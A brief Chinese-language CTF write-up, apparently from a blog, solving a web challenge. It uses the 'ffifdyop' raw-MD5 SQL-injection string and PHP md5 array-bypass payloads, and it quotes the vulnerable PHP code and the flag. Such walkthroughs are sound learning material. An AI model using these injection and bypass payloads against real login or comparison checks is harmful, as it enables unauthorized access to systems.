打开发现

但是发现无论尝试输入什么,都没有任何反应。太难了太难了~~~
发现别人的wp看了响应头

果然里面有提示 Hint: select * from 'admin' where password=md5($pass,true)
ma5函数在指定true时,会返回的原始 16 字符二进制格式
然后又找到了一个万能密码ffifdyop
,这个密码在MD5运算后的结果是'or’6\xc9]\x99\xe9!r,\xf9\xedb\x1c
。
连起来就是select * from 'admin' where password=or’6\xc9]\x99\xe9!r,\xf9\xedb\x1c
然后进入下一步

在源代码中看见了

这不就简单的数组绕过嘛
?a[]=1&b[]=2
发现又来一次
<?php
error_reporting(0);
include "flag.php";
highlight_file(__FILE__);
if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
echo $flag;
}
为啥相同的要来两遍,还是数组绕过
param1[]=¶m2[]=2
得到flag flag{a78f947a-1f9f-4333-ba70-8081bcb5848a}
Comments NOTHING